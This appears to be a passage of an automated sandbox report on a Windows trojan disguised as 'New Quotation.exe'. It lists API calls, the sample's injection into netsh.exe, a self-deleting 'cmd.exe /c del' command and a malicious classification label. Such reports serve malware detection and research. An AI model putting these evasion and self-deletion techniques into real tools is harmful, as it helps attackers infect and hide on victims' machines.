      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D8970F17_2_1D8970F1
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7EB0D07_2_1D7EB0D0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7D00A07_2_1D7D00A0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D88E0767_2_1D88E076
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7EE3107_2_1D7EE310
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D89F3307_2_1D89F330
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7D13807_2_1D7D1380
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7CD2EC7_2_1D7CD2EC
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D89124C7_2_1D89124C
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_031EE31017_2_031EE310
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0329F33017_2_0329F330
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_031D138017_2_031D1380
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0329124C17_2_0329124C
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_031CD2EC17_2_031CD2EC
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_031CF11317_2_031CF113
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0327D13017_2_0327D130
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_032A010E17_2_032A010E
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0322717A17_2_0322717A
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_031E51C017_2_031E51C0
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_031FB1E017_2_031FB1E0
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0328E07617_2_0328E076
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0321508C17_2_0321508C
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_031D00A017_2_031D00A0
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_031EB0D017_2_031EB0D0
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_032970F117_2_032970F1
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_031E276017_2_031E2760
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_031EA76017_2_031EA760
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0327D62C17_2_0327D62C
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_031FC60017_2_031FC600
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0320467017_2_03204670
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0328D64617_2_0328D646
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_031E068017_2_031E0680
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_032536EC17_2_032536EC
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0329F6F617_2_0329F6F6
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0329A6C017_2_0329A6C0
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_031DC6E017_2_031DC6E0
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_032AA52617_2_032AA526
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0329F5C917_2_0329F5C9
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_032975C617_2_032975C6
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_031E044517_2_031E0445
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0324D48017_2_0324D480
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0329FB2E17_2_0329FB2E
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_031E0B1017_2_031E0B10
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0321DB1917_2_0321DB19
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03254BC017_2_03254BC0
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0329CA1317_2_0329CA13
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0329EA5B17_2_0329EA5B
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0329FA8917_2_0329FA89
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_031FFAA017_2_031FFAA0
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0329E9A617_2_0329E9A6
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_031DE9A017_2_031DE9A0
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_032259C017_2_032259C0
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0328083517_2_03280835
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_031E380017_2_031E3800
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0320E81017_2_0320E810
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0325587017_2_03255870
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0329F87217_2_0329F872
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_031E987017_2_031E9870
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_031FB87017_2_031FB870
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_031C686817_2_031C6868
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_032598B217_2_032598B2
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_031F688217_2_031F6882
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_032978F317_2_032978F3
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_031E28C017_2_031E28C0
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_032918DA17_2_032918DA
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_031ECF0017_2_031ECF00
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0329FF6317_2_0329FF63
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0329EFBF17_2_0329EFBF
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03291FC617_2_03291FC6
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_031E6FE017_2_031E6FE0
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03280E6D17_2_03280E6D
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03222E4817_2_03222E48
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03200E5017_2_03200E50
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03290EAD17_2_03290EAD
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_031E1EB217_2_031E1EB2
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_031D2EE817_2_031D2EE8
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03299ED217_2_03299ED2
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0329FD2717_2_0329FD27
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_031DAD0017_2_031DAD00
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03297D4C17_2_03297D4C
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_031E0D6917_2_031E0D69
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_031F2DB017_2_031F2DB0
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0327FDF417_2_0327FDF4
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_031D0C1217_2_031D0C12
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_031EAC2017_2_031EAC20
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03296C6917_2_03296C69
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0329EC6017_2_0329EC60
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0328EC4C17_2_0328EC4C
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_031E3C6017_2_031E3C60
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03279C9817_2_03279C98
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_031F8CDF17_2_031F8CDF
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_032AACEB17_2_032AACEB
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03267CE817_2_03267CE8
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_031FFCE017_2_031FFCE0
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0072E01E17_2_0072E01E
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0072D5A317_2_0072D5A3
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0072D93A17_2_0072D93A
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0072DA5F17_2_0072DA5F
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0072EB7017_2_0072EB70
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0072DB3F17_2_0072DB3F
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_00712D9017_2_00712D90
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_00712D8717_2_00712D87
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_00719E6017_2_00719E60
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_00719E5C17_2_00719E5C
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0072DECE17_2_0072DECE
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_00712FB017_2_00712FB0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: String function: 1D827BE4 appears 96 times
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: String function: 1D85EF10 appears 105 times
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: String function: 1D815050 appears 36 times
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: String function: 1D84E692 appears 86 times
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: String function: 1D7CB910 appears 268 times
      Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 031CB910 appears 268 times
      Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 0324E692 appears 86 times
      Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 0325EF10 appears 104 times
      Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 03215050 appears 36 times
      Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 03227BE4 appears 96 times
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D812DA0 NtReadVirtualMemory,LdrInitializeThunk,7_2_1D812DA0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D812DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_1D812DC0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D812D10 NtQuerySystemInformation,LdrInitializeThunk,7_2_1D812D10
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D812CF0 NtDelayExecution,LdrInitializeThunk,7_2_1D812CF0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D812C30 NtMapViewOfSection,LdrInitializeThunk,7_2_1D812C30
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D812C50 NtUnmapViewOfSection,LdrInitializeThunk,7_2_1D812C50
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D812F00 NtCreateFile,LdrInitializeThunk,7_2_1D812F00
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D812EB0 NtProtectVirtualMemory,LdrInitializeThunk,7_2_1D812EB0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D812ED0 NtResumeThread,LdrInitializeThunk,7_2_1D812ED0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D812E50 NtCreateSection,LdrInitializeThunk,7_2_1D812E50
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D8129F0 NtReadFile,LdrInitializeThunk,7_2_1D8129F0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D812B90 NtFreeVirtualMemory,LdrInitializeThunk,7_2_1D812B90
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D812BC0 NtQueryInformationToken,LdrInitializeThunk,7_2_1D812BC0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D812B10 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_1D812B10
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D812D50 NtWriteVirtualMemory,7_2_1D812D50
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D813C90 NtOpenThread,7_2_1D813C90
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D812CD0 NtEnumerateKey,7_2_1D812CD0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D812C10 NtOpenProcess,7_2_1D812C10
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D812C20 NtSetInformationFile,7_2_1D812C20
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D813C30 NtOpenProcessToken,7_2_1D813C30
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D812FB0 NtSetValueKey,7_2_1D812FB0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D812F30 NtOpenDirectoryObject,7_2_1D812F30
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D812E80 NtCreateProcessEx,7_2_1D812E80
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D812EC0 NtQuerySection,7_2_1D812EC0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D812E00 NtQueueApcThread,7_2_1D812E00
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D8129D0 NtWaitForSingleObject,7_2_1D8129D0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D8138D0 NtGetContextThread,7_2_1D8138D0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D812B80 NtCreateKey,7_2_1D812B80
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D812BE0 NtQueryVirtualMemory,7_2_1D812BE0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D812B00 NtQueryValueKey,7_2_1D812B00
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D812B20 NtQueryInformationProcess,7_2_1D812B20
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D812A80 NtClose,7_2_1D812A80
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D812AA0 NtQueryInformationFile,7_2_1D812AA0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D812AC0 NtEnumerateValueKey,7_2_1D812AC0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D812A10 NtWriteFile,7_2_1D812A10
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D814570 NtSuspendThread,7_2_1D814570
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D8134E0 NtCreateMutant,7_2_1D8134E0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D814260 NtSetContextThread,7_2_1D814260
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_01672999 Sleep,NtProtectVirtualMemory,7_2_01672999
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_01672B09 NtProtectVirtualMemory,7_2_01672B09
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_01672B04 NtProtectVirtualMemory,7_2_01672B04
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_01672A7E NtProtectVirtualMemory,7_2_01672A7E
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_01672ABE NtProtectVirtualMemory,7_2_01672ABE
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_032134E0 NtCreateMutant,LdrInitializeThunk,17_2_032134E0
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03212B80 NtCreateKey,LdrInitializeThunk,17_2_03212B80
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03212B90 NtFreeVirtualMemory,LdrInitializeThunk,17_2_03212B90
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03212BC0 NtQueryInformationToken,LdrInitializeThunk,17_2_03212BC0
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03212A80 NtClose,LdrInitializeThunk,17_2_03212A80
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_032129F0 NtReadFile,LdrInitializeThunk,17_2_032129F0
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03212F00 NtCreateFile,LdrInitializeThunk,17_2_03212F00
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03212E50 NtCreateSection,LdrInitializeThunk,17_2_03212E50
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03212D10 NtQuerySystemInformation,LdrInitializeThunk,17_2_03212D10
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03212DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,17_2_03212DC0
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03212C30 NtMapViewOfSection,LdrInitializeThunk,17_2_03212C30
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03212CF0 NtDelayExecution,LdrInitializeThunk,17_2_03212CF0
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03214260 NtSetContextThread,17_2_03214260
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03214570 NtSuspendThread,17_2_03214570
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03212B20 NtQueryInformationProcess,17_2_03212B20
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03212B00 NtQueryValueKey,17_2_03212B00
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03212B10 NtAllocateVirtualMemory,17_2_03212B10
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03212BE0 NtQueryVirtualMemory,17_2_03212BE0
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03212A10 NtWriteFile,17_2_03212A10
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03212AA0 NtQueryInformationFile,17_2_03212AA0
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03212AC0 NtEnumerateValueKey,17_2_03212AC0
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_032129D0 NtWaitForSingleObject,17_2_032129D0
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_032138D0 NtGetContextThread,17_2_032138D0
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03212F30 NtOpenDirectoryObject,17_2_03212F30
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03212FB0 NtSetValueKey,17_2_03212FB0
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03212E00 NtQueueApcThread,17_2_03212E00
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03212EB0 NtProtectVirtualMemory,17_2_03212EB0
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03212E80 NtCreateProcessEx,17_2_03212E80
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03212EC0 NtQuerySection,17_2_03212EC0
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03212ED0 NtResumeThread,17_2_03212ED0
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03212D50 NtWriteVirtualMemory,17_2_03212D50
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03212DA0 NtReadVirtualMemory,17_2_03212DA0
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03212C20 NtSetInformationFile,17_2_03212C20
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03213C30 NtOpenProcessToken,17_2_03213C30
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03212C10 NtOpenProcess,17_2_03212C10
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03212C50 NtUnmapViewOfSection,17_2_03212C50
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03213C90 NtOpenThread,17_2_03213C90
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03212CD0 NtEnumerateKey,17_2_03212CD0
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0072A360 NtCreateFile,17_2_0072A360
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0072A410 NtReadFile,17_2_0072A410
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0072A490 NtClose,17_2_0072A490
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0072A35A NtCreateFile,17_2_0072A35A
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0072A48A NtClose,17_2_0072A48A
      Source: New Quotation.exe, 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs New Quotation.exe
      Source: New Quotation.exe, 00000007.00000003.49630556665.000000001DC51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenetsh.exej% vs New Quotation.exe
      Source: New Quotation.exe, 00000007.00000003.49340791610.000000001D726000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs New Quotation.exe
      Source: New Quotation.exe, 00000007.00000003.49334795241.000000001D566000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs New Quotation.exe
      Source: New Quotation.exe, 00000007.00000003.49630762121.000000001DC70000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenetsh.exej% vs New Quotation.exe
      Source: New Quotation.exe, 00000007.00000002.49634764269.000000000013C000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamenetsh.exej% vs New Quotation.exe
      Source: New Quotation.exe, 00000007.00000002.49664238302.000000001DA70000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs New Quotation.exe
      Source: New Quotation.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: New Quotation.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: C:\Users\user\Desktop\New Quotation.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Users\user\Desktop\New Quotation.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeSection loaded: edgegdi.dllJump to behavior
      Source: New Quotation.exeStatic PE information: invalid certificate
      Source: New Quotation.exeVirustotal: Detection: 10%
      Source: C:\Users\user\Desktop\New Quotation.exeFile read: C:\Users\user\Desktop\New Quotation.exeJump to behavior
      Source: New Quotation.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\New Quotation.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\New Quotation.exe "C:\Users\user\Desktop\New Quotation.exe"
      Source: C:\Users\user\Desktop\New Quotation.exeProcess created: C:\Users\user\Desktop\New Quotation.exe "C:\Users\user\Desktop\New Quotation.exe"
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
      Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\New Quotation.exe"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\New Quotation.exeProcess created: C:\Users\user\Desktop\New Quotation.exe "C:\Users\user\Desktop\New Quotation.exe" Jump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\New Quotation.exe"Jump to behavior
      Source: C:\Users\user\Desktop\New Quotation.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 1_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_0040352D
      Source: C:\Users\user\Desktop\New Quotation.exeFile created: C:\Users\user\AppData\Local\Temp\nspF7D3.tmpJump to behavior
      Source: classification engineClassification label: mal100.troj.evad.winEXE@10/4@20/20
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 1_2_004021AA CoCreateInstance,1_2_004021AA
      Source: C:\Users\user\Desktop\New Quotation.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 1_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,1_2_0040498A
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4836:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4836:120:WilError_03
      Source: C:\Users\user\Desktop\New Quotation.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Stjernedagenes95Jump to behavior
      Source: New Quotation.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: New Quotation.exe, 00000007.00000001.49189635366.0000000000649000.00000008.00000001.01000000.00000005.sdmp
      Source: Binary string: netsh.pdb source: New Quotation.exe, 00000007.00000003.49630556665.000000001DC51000.00000004.00000800.00020000.00000000.sdmp, New Quotation.exe, 00000007.00000002.49634596314.0000000000120000.00000040.10000000.00040000.00000000.sdmp, New Quotation.exe, 00000007.00000003.49630437748.000000001DC41000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdbUGP source: New Quotation.exe, 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmp, New Quotation.exe, 00000007.00000003.49333316862.000000001D443000.00000004.00000800.00020000.00000000.sdmp, New Quotation.exe, 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, New Quotation.exe, 00000007.00000003.49339217288.000000001D5F9000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000011.00000002.53996151019.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000011.00000003.49639082986.0000000002FF2000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000011.00000002.53997537432.00000000032CD000.00000040.00000800.00020000.00000000.sdmp, netsh.exe, 00000011.00000003.49633352694.0000000002E44000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: netsh.pdbGCTL source: New Quotation.exe, 00000007.00000003.49630556665.000000001DC51000.00000004.00000800.00020000.00000000.sdmp, New Quotation.exe, 00000007.00000002.49634596314.0000000000120000.00000040.10000000.00040000.00000000.sdmp, New Quotation.exe, 00000007.00000003.49630437748.000000001DC41000.00000004.00000800.00020000.00000000.sdmp
